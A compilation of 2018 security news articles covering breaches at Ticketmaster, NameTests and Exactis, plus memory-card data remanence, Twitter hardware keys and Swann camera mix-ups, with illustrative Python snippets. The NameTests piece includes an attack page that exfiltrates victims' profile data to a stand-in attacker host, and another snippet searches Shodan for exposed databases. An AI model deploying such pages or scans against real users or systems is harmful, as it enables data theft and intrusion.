
The Ticketmaster breach – what happened and what to do

Live Nation Entertainment subsidiary Ticketmaster has admitted it has suffered a serious data breach affecting 40,000 of its British and international customers.

Anyone who used the Ticketmaster UK, GETMEIN! and TicketWeb sites to book tickets between February 2018 and 23 June 2018 may have had data compromised, including their name, email address, physical address, telephone number, Ticketmaster logins, and payment card details.

In addition, so-called “international customers” who bought, or tried to buy, tickets between September 2017 and 23 June 2018 could also be affected. (US customers are not part of the alert.)

The issue was caused by malware, spotted on 23 June 2018, that had infected a customer support system managed by Ticketmaster partner Inbenta Technologies, according to an email sent to affected account holders on Wednesday afternoon.

So far, the breach response is still at a stage described by Ticketmaster as follows:

Forensic teams and security experts are working around the clock to understand how the data was compromised.

In other words, we now all know that there was a breach, but not yet how it happened.

What’s happened to the stolen data?

Often, breach notifications refer to card payment data almost in passing, which invites readers to infer that although the data could have been compromised in theory, it wasn’t accessed in practice.

In this case, however, it seems pretty certain that payment card data was not only stolen but is also already being abused.

Digital banking company Monzo claims that the Ticketmaster website showed up as what’s known as a CPP (common point of purchase) in an above-average number of recent fraud reports:

On Friday 6th April [2018], around 50 customers got in touch with us to report fraudulent transactions on their accounts and we immediately replaced their cards.

The company noticed that 70% of these transactions had used the Ticketmaster site between December 2017 and April 2018.
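
That 70% overlap is the essence of common-point-of-purchase analysis: find the merchant that an improbably large share of fraud victims have in common, compared with how many cardholders overall shop there. Here is a minimal sketch of the idea in Python – the function, inputs and threshold are hypothetical illustrations, not Monzo’s actual method:

```python
from collections import Counter

def common_points_of_purchase(fraud_cards, transactions, baseline_share, min_ratio=3.0):
    """Flag merchants that appear in fraud victims' purchase histories
    far more often than in the general cardholder population.

    fraud_cards    -- set of card IDs with confirmed fraud reports
    transactions   -- iterable of (card_id, merchant) pairs
    baseline_share -- dict mapping merchant -> share of ALL cards seen there
    """
    # Count how many distinct fraud victims used each merchant.
    victims_per_merchant = Counter()
    seen = set()
    for card, merchant in transactions:
        if card in fraud_cards and (card, merchant) not in seen:
            seen.add((card, merchant))
            victims_per_merchant[merchant] += 1

    suspects = {}
    for merchant, victims in victims_per_merchant.items():
        fraud_share = victims / len(fraud_cards)   # e.g. 0.70 for Ticketmaster
        base = baseline_share.get(merchant, 0.0)
        if base > 0 and fraud_share / base >= min_ratio:
            suspects[merchant] = fraud_share
    return suspects
```

A merchant used by 70% of fraud victims but only a few percent of cardholders overall stands out immediately.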

And there’s more:

Given the pattern that was emerging, we decided to reach out to Ticketmaster directly. On Thursday 12th April [2018], members of the Ticketmaster security team visited the Monzo office so we could share the information we’d gathered. They told us they’d investigate internally.

Monzo said it had even sent out 6,000 replacement cards in April 2018 to customers who had used Ticketmaster.

If Monzo has it right, it looks as though Ticketmaster was told of the problem more than two months ago, well before it acted on unusual activity last weekend, as stated in its notification email:

On Saturday, June 23, 2018, Ticketmaster UK identified malicious software on a customer support product hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster.

That might have been prompted after MasterCard, also told of the issue by Monzo, issued an alert on 21 June 2018.

Ticketmaster may end up with questions from the UK Information Commissioner’s Office (ICO) about the apparent delay in telling its customers.

What to do?

  • If you’re one of the 40,000 account holders that Ticketmaster says were affected by the compromise, you should have received an email telling you to change your account password. This process should happen automatically the next time you try to log in.
  • If you haven’t been contacted, it’s still a good opportunity to ask yourself whether your Ticketmaster password is sufficiently strong. Change it if there’s any doubt. (This can be done by visiting the Ticketmaster “Forgotten Password” link.)
  • Keep an eye on your bank and payment card statements. Ticketmaster said it will offer affected customers a free 12-month identity monitoring service with a “leading provider”, but whether you take that offer up or not, you need to be on the lookout for unauthorised activity on your accounts.
  • Replace your payment cards as soon as you can if you’re on the list of Ticketmaster customers known to have been affected. In theory, the crooks oughtn’t to have the 3-digit CVV code from the back of your card, and in Europe they oughtn’t to be able to clone your card, thanks to Chip and PIN, but you should get a new card (which invalidates the old one immediately) anyway.
  • Remember that it’s not just card payments that are at risk – the stolen data includes names and addresses, which puts you at risk of identity theft.
  • Keep a special eye and ear out for fraudulent emails, instant messages and phone calls that claim to be connected to this incident. If someone contacts you “about the breach”, never call or message them back based on contact information they gave to you – always find an independent source for the relevant phone number or email address, such as a printed receipt.



Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/n63KKjPK1eE/

Cyber nasties downed NHS systems for 1,300 hours over 36 months

NHS trusts across England experienced more than 1,300 hours of downtime in the last three years, according to the results of a Freedom of Information (FoI) request.

Nearly a third of the trusts (25 out of 80) that responded to an FoI request from Intercity Technology admitted they had experienced outages across their IT systems between January 2015 and February 2018.

Of the 25 trusts that endured a digi-blackout, 14 did so as a result of a security breach. In total, the trusts experienced 18 security breaches over the last three years, causing 18 days of downtime.

These attacks included the infamous WannaCry ransomware outbreak in May 2017, while other trusts fell victim to the Locky and Zepto malware; the most severe incident knocked systems offline for two weeks.

One trust alone experienced an average of one breach per year, while others referenced cyber attacks that affected servers, PCs and internal systems. Another trust suffered problems after an unauthorised device was plugged into a network. This disrupted the business of two wards last year, resulting in downtime of approximately two hours.

Five trusts took their systems offline as a precautionary measure, in response to the WannaCry attack.

Intercity Technology sent FoI requests to 143 NHS trusts in England in February 2018. Eighty responded. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/06/28/nhs_downtime_troubles/

Facebook shells out $8k bug bounty after quiz web app used by 120m people spews profiles

Facebook has forked out an $8,000 reward after a security researcher flagged up a third-party web app that potentially exposed up to 120 million people’s personal information from their Facebook profiles.

This is quite possibly the first cash payment under the social network giant’s new data abuse bug bounty program.

The under-fire Silicon Valley goliath introduced the bug bounty program in April after the Cambridge Analytica data-harvesting scandal. It offered a minimum of $500 – and no maximum – to anyone who provided proof that a third-party app had collected Facebook profile data and transferred it to other parties. It is also a handy PR move by the biz.

Given that it’s only been two months since the scheme was launched and these kinds of investigations can take up to six months, it’s likely that this payout is the first, though Facebook has yet to confirm this, or to say how many other reports are being investigated.

The bounty was awarded after self-described ethical hacker Inti De Ceukelaire found the quiz app at Nametests.com potentially exposed the data of more than 120 million monthly users.

Grabby code

In a blog post yesterday, De Ceukelaire said the web app fetched his personal data and stored it at nametests.com/appconfig_user, where it remained available for other sites to swipe while he was logged in. “In theory, every website could have requested this data,” he said.


Essentially, a malicious webpage in another tab can request the above URL to grab your profile details, once you’ve connected Nametests to your Facebook account. The app attempts to work out “what does your name really mean?”
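
De Ceukelaire’s write-up indicates the endpoint returned the data wrapped in JavaScript (JSONP-style), which is what lets a plain cross-origin script include work: the browser attaches the victim’s NameTests cookies automatically. Here is a hypothetical sketch of the kind of page an attacker could serve – the callback name, wrapper behaviour and collection endpoint are all invented for illustration:

```python
# Sketch only: builds the HTML an attacker's page might use to grab the
# JSONP-wrapped profile data. "leak" and attacker.example are invented;
# the real wrapper on nametests.com/appconfig_user differed in detail.
ATTACK_PAGE = """<!doctype html>
<script>
  function leak(profile) {             // receives the victim's data
    navigator.sendBeacon('https://attacker.example/collect',
                         JSON.stringify(profile));
  }
</script>
<!-- The browser attaches the victim's NameTests cookies automatically: -->
<script src="https://nametests.com/appconfig_user"></script>
"""

if __name__ == "__main__":
    print(ATTACK_PAGE)   # write this out and serve it from any origin
```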

Information revealed included first name, last name, language, gender and birth date – all of which would remain accessible even after the app was disconnected from a Facebook account. In addition, a token gave access to all the data the user had authorised the application to access, which might include photos, posts or friend lists.

“I was shocked to see that this data was publicly available to any third-party that requested it,” said De Ceukelaire.

To demonstrate that the information could be nabbed, De Ceukelaire set up a website that connected to NameTests and gained access to a person’s posts, photos, and friends for up to two months. Here’s a video demonstrating the slurp:

[Embedded YouTube video]

NameTests launched in 2015, and De Ceukelaire reckons the flaw had been present since 2016; with the app claiming some 120 million users each month, it could have affected a large number of people.

“Abusing this flaw, advertisers could have targeted (political) ads based on your Facebook posts and friends,” the researcher said. “More explicit websites could have abused this flaw to blackmail their visitors, threatening to leak your sneaky search history to your friends.”

However, as De Ceukelaire pointed out, it isn’t clear how many people, if any, have been affected, noting also that only users that visited an attacker’s website would have their data leaked to the attacker.

An early starter

De Ceukelaire reported the bug on April 22, just 12 days after the bug bounty program was announced, and this week spotted that NameTests had changed the way it processed data, with third parties no longer able to download the information.

When he contacted the Zuckerborg, the biz agreed to pay a bounty of $4,000, which it doubled because De Ceukelaire had requested it be given to the non-profit Freedom of the Press Foundation (every chance for a good PR opp, eh?).

Ime Archibong, veep of product partnerships at Facebook, said: “A researcher brought the issue with the nametests.com website to our attention through our Data Abuse Bounty Program that we launched in April to encourage reports involving Facebook data. We worked with nametests.com to resolve the vulnerability on their website, which was completed in June.”

However, the presence of such a simple flaw raises questions about Facebook’s screening processes, as basic security tests should have spotted the problem.

No foul on our part

For its part, NameTests.com has a set of guarantees on its feedback page, which include promises that data will never be sold to third parties, that users can unsubscribe at any time, and that it complies with “strict data protection laws.”

In a statement to El Reg, it said that data security was taken very seriously and measures were being taken to avoid risks in the future. It added: “The investigation found that there was no evidence that personal data of users was disclosed to unauthorised third parties and all the more that there was no evidence that it had been misused.”

Meanwhile, Facebook is undertaking a wider probe into apps that accessed user data before the firm announced changes to its Graph API use policies in 2014 – this is at the heart of the Cambridge Analytica scandal because it allowed the app developed by GSR to suck up info on not just a user, but also all of their friends.

Last month, the tech giant offered a progress update, saying that it had suspended 200 apps “pending a thorough investigation into whether they did in fact misuse any data.”

The biz has promised to notify users if there is evidence of any apps misusing data. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/06/28/facebook_data_abuse_bug_bounty/

Newly Revealed Exactis Data Leak Bigger Than Equifax’s

Marketing data firm left its massive database open to the Internet.

What happens when you leave a database filled with personal information open to the Internet? People find it: That’s what happened to marketing data firm Exactis with its database of information on roughly 340 million people.

Security researcher Vinnie Troia of Night Lion Security discovered the database through a Shodan search. Exactis is a marketing data company that provides companies with the sort of information needed to target ads to people browsing the Web.
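
Shodan indexes the banners of devices and services listening on the open internet, so finding exposed databases can be as simple as a keyword query. Here is a minimal sketch using Shodan’s official Python library – the API key is a placeholder, and the query is illustrative rather than Troia’s actual search (the Exactis database was reportedly an exposed Elasticsearch server):

```python
import shodan  # pip install shodan

api = shodan.Shodan("YOUR_API_KEY")  # placeholder; requires a real key

# Elasticsearch answers on TCP 9200 by default; a banner search turns up
# instances exposed to the whole internet, no authentication required.
results = api.search('product:"Elastic" port:9200')

print(f"Total exposed instances indexed: {results['total']}")
for match in results["matches"][:10]:
    print(match["ip_str"], match.get("org", "unknown org"))
```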

Troia told Wired, “It seems like this is a database with pretty much every US citizen in it,” adding, “I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”

While the data did not include credit card or social security numbers, it did include everything from political preferences to browsing and purchase data for a wide variety of items. Taken together, the pieces of information would allow an advertiser or database user to form a very detailed picture of the targeted individual.

“The data reported to have been leaked is incredibly comprehensive and can be used by hackers to develop more targeted phishing scams,” said John “Lex” Robinson, cybersecurity strategist at Cofense. “Phishing is a serious threat because it works, with personalized phish often making their way past stacks of expensive technology layers and email gateways to land in an unsuspecting user’s inbox.”

In terms of size, the Exactis leak dwarfs the Equifax breach, which exposed nearly 146 million records. Exactis has now taken the database off the public Internet, but has made no public statement on the affair. At the time of this article’s publication, the company’s website was down, with a request returning a 508 error.



Article source: https://www.darkreading.com/vulnerabilities---threats/newly-revealed-exactis-data-leak-bigger-than-equifaxs/d/d-id/1332175?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

65% of Resold Memory Cards Still Pack Personal Data

Analyzed cards, mainly from smartphones and tablets, contained private personal information, business documentation, audio, video, and photos.

Wipe your device, then check it twice: A new study has found most secondhand memory cards contain personal information belonging to previous owners who either failed to properly remove their data or didn’t attempt to delete it at all.

“We make such a big deal out of Facebook giving away our details, but many of us just leave this stuff out there on our local memory,” says Comparitech privacy advocate Paul Bischoff.

In a study conducted by the University of Hertfordshire and commissioned by Comparitech, researchers bought and analyzed 100 used SD and micro SD memory cards from eBay, secondhand shops, auctions, and other sources over a four-month period. They created a forensic image of each card and used freely available software to recover data.
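
Recovering files from an image like this boils down to “file carving”: scanning the raw bytes for known file signatures and cutting out what lies between them. Here is a bare-bones sketch of the idea for JPEGs – real recovery tools are far more robust, and card.img is a hypothetical raw dump of a card:

```python
# Minimal JPEG carver: find start/end markers in a raw card image and
# extract the candidate files between them.
SOI = b"\xff\xd8\xff"   # JPEG start-of-image marker
EOI = b"\xff\xd9"       # JPEG end-of-image marker

with open("card.img", "rb") as f:
    data = f.read()

count, pos = 0, 0
while (start := data.find(SOI, pos)) != -1:
    end = data.find(EOI, start)
    if end == -1:
        break
    with open(f"recovered_{count}.jpg", "wb") as out:
        out.write(data[start:end + len(EOI)])
    count += 1
    pos = end + len(EOI)

print(f"Carved {count} candidate JPEGs")
```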

Most of the cards came from smartphones and tablets, Bischoff says, but some also came from satellite navigation systems, cameras, and drones. Sixty-five of the 100 cards analyzed still contained troves of personal material, among them contact lists, browsing histories, intimate photos, passport copies, resumes, identification numbers, and business documentation.

“It’s really easy when people get a new device to just throw out the old one and get rid of it completely,” Bischoff notes. “If this information gets out there into the wrong hands, it could do a lot of damage … identity theft, extortion, blackmail.”

Only twenty-five cards had been properly wiped so that no information could be recovered. Thirty-six were not wiped at all; neither their owners nor the sellers took any steps to erase the data. Twenty-nine appeared to have been formatted, meaning their owners attempted to erase their information, but data could still be recovered “with minimal effort,” the researchers explain. Four were broken, four were blank, and two had had their data deleted, but it was easily recoverable.

If a card is tossed without the proper precautions, Bischoff says, it’s fairly easy for any third party to access the data inside. “It really doesn’t take much know-how,” he explains, noting that the researchers used free forensics software they found online to recover information.

The findings underline how device owners, businesses, and resellers all share responsibility for wiping information before it falls into someone else’s hands. Users need to be more careful about deleting their data, of course, but resellers also need to properly wipe devices sold to them. Card manufacturers have a role to play, too, in making the process of erasing and disposing of cards both easier and more obvious for users, Bischoff adds.

“If it’s corporate-owned, it really depends on what the business structure is for dealing with this sort of thing,” he continues. In the case of BYOD devices, IT teams might not be able to remotely control or access an employee’s smartphone or tablet. Bischoff says the cards containing business data in this study were likely personally owned, with the owners having downloaded sensitive work files.

Phones containing sensitive data should have all files backed up to a secure cloud service, or have user access controls in place to stop users from saving important files locally on the device.

Researchers anticipate problems related to improperly erased data will continue as local storage gets less expensive and people store more types of information on memory cards. However, Bischoff argues, the expansion of cloud storage will cause people to shift.

“Obviously storage demands are increasing, but the rise of the cloud will minimize the effects to some degree,” he says. “I think people will store in the cloud and skip local storage altogether.”

How to Properly Delete Data
If you plan on reselling your smartphone, laptop, camera, or other device equipped with an SD or micro SD card, you need to properly delete the data. Many people try to wipe their SD cards but fail to get rid of all the information. Simply deleting a file from the device doesn’t actually delete the ones and zeroes that make up the file; those stay on the device until overwritten.

You need to perform a “full format,” not a “quick format,” Bischoff says. The process varies depending on your operating system, but both Windows and Mac devices have built-in formatting tools that can erase all information from an external storage device.
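
The same principle applies to individual files: deletion only removes the directory entry, so the underlying bytes survive until overwritten. Here is a simple sketch of an overwrite-then-delete in Python – note that on flash media such as SD cards, wear-levelling means an in-place overwrite isn’t guaranteed to hit the original cells, which is why a full format (or physical destruction) is the safer bet:

```python
import os

def overwrite_and_delete(path: str) -> None:
    """Overwrite a file's contents with zeros before unlinking it.

    A plain os.remove() only drops the directory entry; the file's
    ones and zeroes stay on the medium until something overwrites them.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        f.seek(0)
        f.write(b"\x00" * size)
        f.flush()
        os.fsync(f.fileno())   # force the zeros out to the device
    os.remove(path)

# Usage: overwrite_and_delete("holiday_photo.jpg")
```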



Article source: https://www.darkreading.com/mobile/65--of-resold-memory-cards-still-pack-personal-data/d/d-id/1332179?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

There’s No Automating Your Way Out of Security Hiring Woes

The paradox of cybersecurity automation: It makes your staff more productive but takes more quality experts to make it work.

Enterprises increasingly depend on security automation and orchestration to help them keep up with the growing volume of cyberthreats. But at the same time, backlash is growing against the vendor marketing trope that security automation is the answer to bridging the cybersecurity skills gap.

According to a Dark Reading survey conducted earlier this year, just 45% of organizations report that their security teams are fully staffed, and only 33% say they’re armed with the right mix of skills to meet the threats coming in the next year. More startlingly, just 14% of those surveyed say there are plenty of skilled cybersecurity workers available to fill the ranks. Meantime, the latest Global Information Security Workforce Study from (ISC)2 says we’ll be facing a shortfall of 1.8 million security workers by 2022.

And those are just a sampling of the skills shortage metrics. There are plenty more where these came from.

The reflexive answer from many in the industry is, “Well, let’s just automate our way out of this problem!” But security leaders on the front line of enterprise defense are stepping forward with more frequency to poke holes in that simplistic solution. The latest evidence of this comes by way of a study out this week from Ponemon Institute and Juniper Networks. 

The study shows that, yes, 64% of organizations believe security automation can increase the productivity of their security personnel. And 60% believe automated correlation of threat behavior is essential to addressing the volume of threats today.  

But at the same time, respondents’ answers indicate that automation isn’t going to solve the team-building problem. In fact, those hiring issues are making it difficult for many organizations to effectively leverage security automation. The study shows only 35% of respondents say their organizations have the in-house skills to effectively use security automation for responding to threats.

“Automation will do anything but close the cybersecurity staffing gap,” says Druva CISO Drew Nelson. “Apply automation to security, and you are in a catch-22. Any tasks that are automated are likely to be simple, with defined start and end points. Any ‘remaining items’ are going to be left over for the security staff to carry out. Arguably, these are going to be the more painful and arduous tasks that are repetitive in nature but require deep technical and domain knowledge.”

Not only do the incident response and risk mitigation tasks left behind by automation tend to require a more skilled responder, but getting automation properly set up is also an issue. More than half of organizations say they’re unable to recruit knowledgeable or skilled personnel to deploy their security automation tools. It also often takes a lot of in-the-field experience to identify and codify the processes to be automated within any given organization. And then there is the issue of integration: the study shows that 63% of organizations report difficulties integrating their security automation technology and tools with existing systems.

“While the desire to automate is understandable, the process of setting up the automation can be incredibly complex and resource-draining,” says Tim Helming, director of product management at DomainTools, which recently sponsored a different Ponemon Institute survey, published last month, that offered up similar results to this most recent study. That research concluded that automation is actually exacerbating, rather than helping, the skills shortage problem.



Article source: https://www.darkreading.com/careers-and-people/theres-no-automating-your-way-out-of-security-hiring-woes/d/d-id/1332180?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Twitter introduces another way for you to better secure your account

Twitter has added the ability to authenticate to the service using hardware tokens such as Yubico’s YubiKey.

Announced towards the end of a blog post on the company’s efforts to deter spam and malicious bots, it marks a convenient step up in security for Twitter users who might already be using this type of security with other services.

The company introduced SMS-based Login Verification almost five years ago, but since then, it’s been slow to move with the times. What’s more, it’s been accepted for some time that SMS authentication is less than secure in a number of different ways – it is vulnerable via the mobile app, through attacks on the network, or through SIM swap fraud.

Six months ago, some time after this feature was enabled by other internet brands such as Google and Facebook, Login Verification became possible on Twitter through the use of third-party apps such as Google Authenticator, Duo Mobile, or Authy.

That has now been extended to FIDO Universal 2nd Factor (U2F) security keys. Using one makes it much harder to hack an account even when an attacker has got hold of the username and password, because logging in also requires physical possession of the token.
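
Under the hood this is a challenge–response protocol: the server stores only a public key, and each login requires the physical token to sign a fresh random challenge with a private key that never leaves the device. Here is a deliberately simplified sketch of that idea – real U2F uses ECDSA over P-256 plus origin binding and signature counters, not the Ed25519 shorthand used here:

```python
import os
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# -- Enrolment: the key pair is born on the token and never leaves it.
token_private = Ed25519PrivateKey.generate()
server_public = token_private.public_key()   # server stores this copy

# -- Login: the server sends a fresh random challenge...
challenge = os.urandom(32)

# ...the physical token signs it (this is why possession matters)...
signature = token_private.sign(challenge)

# ...and the server verifies the signature with its stored public key.
try:
    server_public.verify(signature, challenge)
    print("second factor OK")
except InvalidSignature:
    print("second factor failed")
```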

You’ll find the Twitter setting to turn this on by visiting Settings and privacy > Account > Review your login verification methods > Login verification.

When we tried this on an account without any method of verification in place, it asked us to enable SMS verification to the registered mobile number first, after confirming our password. With that step complete, the options to use an authentication app or enrol a token appeared.

This is an authentication check on the act of setting up even stronger authentication, presumably to avoid attackers breaking into accounts and locking people out completely.

It’s worth saving a backup code to guard against the possibility of losing the key or not having access to the mobile authenticator app. You can print out a list of codes for safe keeping. Also, note that enabling Login Verification will require using a one-off temporary password on other desktop computers or apps – your usual username and password won’t work.

Explains Twitter’s Login Verification guide:

For example, if you enabled login verification in your account settings on the web and need to login to the Twitter for Mac app, you will need to use a temporary password to do so.

I set up authentication through Chrome without any problems; however, the U2F key enrolment refused to complete on Firefox. I’m unsure why this happened (Firefox supports U2F authentication). I have sought clarification on this from Twitter – along with further detail on how mobile devices will support Twitter hardware authentication when those tokens lack NFC support. I will update this article if and when I hear back.

Twitter is also not forthcoming about how many of its users have bothered to turn authentication on in any form. If Google is anything to go by, very few.

That’s a huge shame. Two-factor authentication is an excellent, cheap security upgrade that everyone should use.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/nYIXlT4wyrU/

US legislators put industrial control system security on the map

After a spate of attacks on industrial control systems (ICS), the US this week officially recognized the need to secure them with a new bill. On Monday, House representatives passed legislation to bring these systems under the protection of the Department of Homeland Security.

H.R. 5733, AKA the “DHS Industrial Control Systems Capabilities Enhancement Act”, is a short bill that effectively highlights industrial control systems as a vulnerable point in US critical infrastructure by including them in the 2002 Homeland Security Act. It amends the 2002 Act, which made no mention of ICS, to include specific language about them.

The new legislation calls on the National Cybersecurity and Communications Integration Center (NCCIC) to find and fix threats to industrial control system technologies used in critical infrastructure. It must also provide technical assistance with securing industrial control system products to a range of stakeholders, including manufacturers and end users.

The move may seem like a semantic one, but it is a reaction to a string of attacks that have worried lawmakers in the US. In October, US-CERT warned that hackers were targeting energy, nuclear, water, aviation and critical manufacturing sectors.

Insecure ICS could lead to disaster in unexpected areas. Experts warned last year of potential hacks that could compromise marine equipment around the world.

Don Bacon, the representative who authored the bill, warned of dire consequences if organizations running critical national infrastructure did not tighten up ICS security.

The next ‘Pearl Harbor attack’ will not be with missiles and torpedoes alone, but will be paired with attacks to our private sector functions needed to support our daily lives, such as our electric grid.

The new legislation may put ICS officially on the list of vulnerable systems to protect, but the key will be in the implementation, and especially in whether the DHS works to change the underlying mechanics of security in ICS component manufacturing. A 2017 report on critical infrastructure security by MIT researcher Joel Brenner highlighted the use of cheap, general-purpose hardware and software as components in industrial control systems, driven by commercial concerns.

Brenner’s report called for an initiative to create incentives for producing and using secure and less complex hardware, software, and controls for use in critical infrastructure. This should be directed by a lead departmental secretary reporting directly to the President, it advised.

Having passed the House, the bill reached the Senate on Tuesday, where it was referred to the Committee on Homeland Security and Governmental Affairs.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/3z8zJuVbXog/

Are you happy with this technology that Facebook’s developing?

Technology developed and patented by Facebook suggests it’ll know when you’re sleeping, know when you’re awake… it’ll even know if you’ll live or die… so be good for goodness’ sake?

These patents, filed by Facebook in the past few years and reported by the New York Times, reveal some behind-the-scenes thinking about what Facebook has deemed worth developing and protecting. It doesn’t necessarily mean we’ll see these features in Facebook in the future, but it gives us an idea of where the social media giant thinks things are headed in how we (the consumers) use apps and what kind of personal data we might be willing to divulge.

Some of the patents are more surprising than others. Many seem like a logical progression from what Facebook already does: learning as much about us as possible to try and sell us things. These patents include:

  • One that classifies a user’s personality based on what they post publicly and send as messages, in order to serve more targeted stories and ads.
  • Another that tries to figure out who our closest friends are by tracking our phone’s location relative to other phones.
  • A third that aims to uniquely identify cameras based on flaws Facebook could discern, like a scratch or bad pixel.

To be honest, the more cynical (or savvy, depending on your point of view) may well have assumed that Facebook was already doing something along these lines as it is.

Other patents, however, may push the boundary not only on what we’re comfortable with Facebook knowing, but also what we’re comfortable knowing ourselves. These include:

  • A patent that the NYT writes, “describes using your posts and messages, in addition to your credit card transactions and location, to predict when a major life event, such as a birth, death or graduation, is likely to occur.”
  • Another that proposes listening in on the TV shows we’re watching and whether or not we listened to the ads.
  • One that proposes tracking our daily routines, including where we are and when, and potentially notifying someone else if we deviate too far from that routine.

You may have already opted in to apps that do something similar to Facebook’s long list of patents. For example, one proposes learning how long we sleep by tracking how long our phone is stationary at night – many people already allow this as a method of tracking their sleep patterns and sleep quality with apps and wearable gadgets. In the case of iOS, these tracker gadgets and apps often work with the Health app built into iPhones, so Apple already has all that fantastic data about your health and sleep habits.

The question might then become: Are consumers who share this information with Apple also comfortable sharing that kind of information with Facebook? In light of recent events, such as the Cambridge Analytica scandal, the answer may well be no.

Whether or not you think these kinds of features are a massive, creepy overreach will likely depend on whether you find them useful, and whether you’re comfortable with one company aggregating all this information. (And again, these patents are not a product roadmap for Facebook, so it is entirely possible we’ll never see them in action.)

What these patents do seem to indicate is that tech companies like Facebook will continue to push the limits on consumer comfort when it comes to data sharing. What remains to be seen is when – or if – consumers will decide they’re no longer happy to play along.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7q5uJZl6aMI/

OMG! I just received someone else’s security camera footage!

Here’s another “security surveillance system SNAFU” story, just two weeks since our last one.

(As we noted back then, plain old webcam bugs are one thing, but vulnerabilities in camera systems that are supposed to increase security are quite another.)

Last time, the problem was a combination of three different bugs, each one modestly dangerous on its own, that could be chained together to construct a critical exploit.

At worst, the trifecta of bugs in that case could have allowed anyone on the internet to wander into your network at will via one of your security devices.

In today’s story, however, the crooks didn’t break into the webcam and steal data out of it.

Instead, the camera uploaded a bunch of data on purpose, but chose the wrong person to send it to.

In fact, the person to whom the video data was incorrectly leaked

…just happened to be a BBC staffer enjoying some off-duty weekend time at home.

Talk about having a fascinating data leakage story dropping into your app!

What happened?

If you think of CCTV systems from even just a few years ago, you’ll probably wonder what a security camera was doing dropping data into an app in the first place.

Well, surveillance systems have changed a lot recently.

CCTV cameras aren’t just wireless these days, but often also softwareless and serverless too.

OK, strictly speaking, the camera needs a server to connect to, and that server needs special software running to take care of the uploads, but both the server and the software can be hosted in the cloud.

As the owner of the camera, you no longer have to set up any additional hardware or software of your own – you need no more than the camera itself, an internet connection, and a web browser (or a browser-like app on your mobile phone) to log in to the camera vendor’s website.

The vendor’s servers take care of collecting the data, processing it to look for anomalies, and sending alerts to your browser or your phone if something suspicious happens…

…and all you have to do is hope that they don’t send your alerts to someone else by mistake, as happened in this case.

What went wrong?

According to the BBC, Swann explained away the mistake as follows:

[H]uman error had caused two cameras to be manufactured that shared the same bank-grade security key – which secures all communications with its owner. This occurred after the [family] connected the duplicate camera to their network and ignored the warning prompt that notified: ‘Camera is already paired to an account’, and left the camera running.

This explanation is feasible, but it doesn’t bring any closure to the incident, because it implies that the problem could easily occur again – after all, how realistic is it to expect a human to check a cryptographic key, say 3c8c0279dd24f6d7c07a00db30767ec4, against a list of all keys used on all previous devices?

Let’s assume that the key we’re talking about here is a public/private key pair, where the vendor’s servers get a copy of the public key so they can validate the camera sending in each data block, and the camera keeps the private key to itself so it’s the only device in the world that can sign content with that key.

Why not get the camera to generate a new keypair when it is first set up (or subjected to a factory reset), thus ensuring both that the private key only ever exists on the camera itself, and that the keypair is always unique?

Granted, it’s easy to make a cryptographic blunder when you program an IoT device to generate a new, random keypair, because random numbers can be tricky to generate in software on embedded devices.

Many pseudo-random number generators rely on mixing in ever-changing data such as the time of day, the number of milliseconds since the computer was turned on, or the distance that the mouse moved in the past 30 seconds, as a way of reducing the predictability of the algorithm – a process known in the jargon as increasing entropy. On embedded devices fresh out of the box, however, there’s no mouse to monitor, the clock always starts off set to zero (on Linux-based systems, zero typically denotes midnight on 01 January 1970), and you can guess to within a few seconds either way how long the initial setup software is likely to take to get to the part where the cryptographic keys are generated. This means you need to be really careful not to generate “predictable randomness” when doing cryptographic programming on stripped-down hardware.

Nevertheless, with suitable care and attention, it is possible to ensure that each device you sell will automatically end up registered uniquely with your cloud services – Apple, for instance, can reliably tell its iPhones apart, even though it has sold more than a billion of them.
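
Done carefully, the fix sketched above amounts to a few lines of code at first boot. Here is a minimal illustration – the device_id and registration endpoint are hypothetical, and it assumes the device’s kernel CSPRNG (behind os.urandom) has been seeded with genuine hardware entropy, which is exactly the caveat discussed above:

```python
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives import serialization

def first_boot_setup(device_id: str):
    # The key pair is generated on the camera itself, so the private
    # key never exists anywhere else and every unit is unique by
    # construction - no factory-side key duplication to go wrong.
    private_key = Ed25519PrivateKey.generate()

    public_pem = private_key.public_key().public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    # Only the public half leaves the device during registration, e.g.:
    #   POST https://cloud.example/register  {device_id, public_pem}
    return private_key, public_pem
```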

Could it happen again?

The BBC documented a second case in the UK of a Swann security system sending one customer’s data to another – a couple in Leicestershire, England, who started receiving camera footage of an unknown pub.

In an amusing conclusion (albeit one that proves that even banal, harmless-looking images can harm your privacy), the couple actually managed to identify the pub concerned.

Turns out it was near their house, so they paid a visit – and in a fit of wit, took a selfie using the pub’s camera!

What to do?

Let’s hope that Swann identifies the problems in its manufacturing workflow that make this sort of “doppelgänger camera” situation possible…

…and eliminates them.

At the moment, the company doesn’t sound very convincing in its response to what is an unusual, though unsettling, data breach dilemma.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/R8wKBGKGuKw/